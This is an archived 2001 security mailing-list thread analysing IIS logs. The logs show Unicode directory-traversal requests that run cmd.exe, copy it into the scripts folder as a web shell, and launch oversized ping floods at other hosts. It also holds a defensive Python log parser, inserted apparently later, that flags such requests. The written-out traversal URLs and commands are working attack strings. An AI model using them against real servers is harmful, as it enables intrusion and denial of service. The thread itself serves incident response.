Re: Unicode Logs with Ping Activity

From: Blake Frantz (blakeat_private)
Date: Tue Jul 10 2001 - 10:39:20 PDT

    I've found that if the '-n' argument is set extremely high in the
    ping command W3SVC adds a line to Event Viewer stating that the 
    script had timed out.
    
    For example, the following request:
    /scripts/..%5c..%5cwinnt/system32/cmd.exe?+/c+ping+-n+120000+-l+65411+-w+130+-v+107+123.123.123.123
    
    
    would generate an event such as this:
    
    The script started from the URL
    '/scripts/..%5c..%5cwinnt/system32/cmd.exe' with parameters
    '/c+ping+-n+120000+-l+65411+-w+130+-v+107+123.123.123.123' has not
    responded within the configured timeout period.  The HTTP server is
    terminating the script. 
    
    Blake
    
    ================================================================= 
    The Government, like diapers, should be replaced regularly, and
    often for the same reasons. 
    
    On Tue, 10 Jul 2001, Jordan K Wiens wrote:
    
    > No, a 502 error is a bad gateway error; what happens is that your iis
    > server is unpatched against the unicode exploits (one of them, at least) and
    > is executing the command to ping a host.  Just recently there seems to be
    > an increase in the number of hackers using vulnerable web servers for ddos-
    > like behavior using over-sized pings.
    > 
    > When the ping command executes, it runs the pings, however, it (obviously)
    > does not return complete html headers as its output (since ping was never
    > meant to run via the web, it's not supposed to run like a normal web
    > executable). IIS notices this, and realizes that the script hasn't
    > correctly executed, and lets you know with the 502 error.  If you actually
    > look at the page, the results would read something like: "502 error; the
    > application has not returned correct headers.  The headers it did return
    > are:" and then IIS would proceed to show the output of whatever had been
    > shown.
    > 
    > The error you want to see once a machine has been fully patched is usually
    > a 404 error.
    > 
    > -- 
    > Jordan Wiens
    > UF Network Incident Response Team
    > (352)392-2061
    > 
    > On Tue, 10 Jul 2001 myrddin_eat_private wrote:
    > 
    > > Would like someone to help me understand what is going on here... The 502 
    > > error at the end of these entries would indicate failures, wouldn't 
    > > they? I've been all through the logs on this box, and even though every 
    > > attempt to copy c:\winnt\system32\cmd.exe to c:\inetpub\scripts\shell.exe 
    > > shows a 502, it is there.
    > > 
    > > I'm looking at the times on the log entries and guessing that this was a 
    > > manual attack.
    > > 
    > > Also, can someone please explain what is being attempted with these pings?
    > > aaa.aaa.aaa.aaa
    > > bbb.bbb.bbb.bbb
    > > ccc.ccc.ccc.ccc.ccc
    > > ddd.ddd.ddd.ddd.ddd 
    > > are all unique addresses.
    > > 
    > > #Software: Microsoft Internet Information Services 5.0
    > > #Version: 1.0
    > > #Date: 2001-06-19 18:44:15
    > > #Fields: date time c-ip cs-username s-ip s-port cs-method cs-uri-stem cs-
    > > uri-query sc-status cs(User-Agent) 
    > > 2001-06-19 18:44:15 aaa.aaa.aaa.aaa - bbb.bbb.bbb.bbb 80 GET /scripts/../../winnt/system32/cmd.exe 
    > > /c+copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\shell.exe 502 -
    > > 2001-06-19 19:24:28 aaa.aaa.aaa.aaa - bbb.bbb.bbb.bbb 80 GET /scripts/../../winnt/system32/cmd.exe 
    > > /c+ping+-v+ip-header-bad%20-n+300+-l+65500+-w+0+ccc.ccc.ccc.ccc 502 -
    > > 2001-06-19 19:31:42 aaa.aaa.aaa.aaa - bbb.bbb.bbb.bbb 80 GET /scripts/../../winnt/system32/cmd.exe 
    > > /c+ping+-v+host-precedence-violation%20-n+300+-l+65500+-w+0+ddd.ddd.ddd.ddd 
    > > 502 -
    > > 
    > 
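As an added example (not code from any poster in this thread), here is a small parser for the IIS 5.0 W3C extended log format quoted above; it keys each record by the `#Fields` header and classifies traversal requests to cmd.exe by status code the way Jordan describes (502 where the command ran but returned no HTTP headers, 404 on a patched server). The log lines are constructed from the format shown in the thread, with placeholder addresses.

```python
import urllib.parse

# Constructed sample in the IIS 5.0 W3C extended format quoted in the thread;
# addresses are placeholders, not real indicators.
SAMPLE_LOG = r"""#Software: Microsoft Internet Information Services 5.0
#Version: 1.0
#Date: 2001-06-19 18:44:15
#Fields: date time c-ip cs-username s-ip s-port cs-method cs-uri-stem cs-uri-query sc-status cs(User-Agent)
2001-06-19 18:44:15 aaa.aaa.aaa.aaa - bbb.bbb.bbb.bbb 80 GET /scripts/../../winnt/system32/cmd.exe /c+copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\shell.exe 502 -
2001-06-19 19:24:28 aaa.aaa.aaa.aaa - bbb.bbb.bbb.bbb 80 GET /scripts/../../winnt/system32/cmd.exe /c+ping+-v+ip-header-bad%20-n+300+-l+65500+-w+0+ccc.ccc.ccc.ccc 502 -
2001-06-19 19:40:01 aaa.aaa.aaa.aaa - bbb.bbb.bbb.bbb 80 GET /scripts/..%5c..%5cwinnt/system32/cmd.exe /c+ping+-n+300+-l+65500+ddd.ddd.ddd.ddd 404 -
2001-06-19 19:41:10 eee.eee.eee.eee - bbb.bbb.bbb.bbb 80 GET /default.htm - 200 Mozilla/4.0
"""

def parse_w3c(text):
    """Yield one dict per record, keyed by the names in the #Fields directive."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line[len("#Fields:"):].split()
        elif line.startswith("#") or not line.strip():
            continue  # other directives and blank lines
        elif fields is not None:
            values = line.split()  # IIS writes '+' for spaces inside a field
            if len(values) == len(fields):
                yield dict(zip(fields, values))

def classify(rec):
    """Return a finding for traversal-to-cmd.exe requests, else None."""
    # Decode %5c etc. and normalise backslashes so both spellings match.
    stem = urllib.parse.unquote(rec["cs-uri-stem"]).replace("\\", "/").lower()
    if "/.." not in stem or not stem.endswith("/cmd.exe"):
        return None
    # In the query '+' separates arguments; %20 is a literal space.
    command = urllib.parse.unquote(rec["cs-uri-query"].replace("+", " "))
    status = rec["sc-status"]
    if status == "502":  # cmd.exe ran but returned no HTTP headers
        verdict = "likely executed"
    elif status == "404":  # path not resolved: expected on a patched server
        verdict = "blocked"
    else:
        verdict = "review"
    return {"time": rec["date"] + " " + rec["time"], "client": rec["c-ip"],
            "command": command, "status": status, "verdict": verdict}

def find_traversal_hits(text):
    return [hit for hit in map(classify, parse_w3c(text)) if hit]

if __name__ == "__main__":
    for hit in find_traversal_hits(SAMPLE_LOG):
        print(f'{hit["time"]} {hit["client"]} {hit["status"]} {hit["verdict"]}: {hit["command"]}')
```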
    
    
    
    ----------------------------------------------------------------------------
    
    
    This list is provided by the SecurityFocus ARIS analyzer service.
    For more information on this free incident handling, management 
    and tracking system please see:
    
    http://aris.securityfocus.com
    



    This archive was generated by hypermail 2b30 : Wed Jul 11 2001 - 13:26:55 PDT